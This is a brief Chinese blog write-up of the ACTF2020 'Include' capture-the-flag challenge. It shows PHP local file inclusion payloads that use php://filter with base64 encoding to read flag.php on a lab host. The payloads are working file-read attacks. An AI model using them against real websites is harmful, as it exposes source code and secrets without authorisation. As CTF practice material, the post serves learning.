[ACTF2020 新生赛]Include 1

进入靶场:

根据题目提示的include,想到使用php://filter读取文件

读取文件payload:

# 明文读取
index.php?file1=php://filter/resource=file.txt

# 编码读取
index.php?file1=php://filter/read=convert.base64-encode/resource=file.txt

构造payload:

http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/resource=flag.php

http://c4edc9e2-34ec-48a3-8616-117f4cdd45e9.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php

 

 明文读取无效,尝试编码读取

 

 得到flag!

posted @ 2022-07-08 14:19  mdgdscy  阅读(51)  评论(0编辑  收藏  举报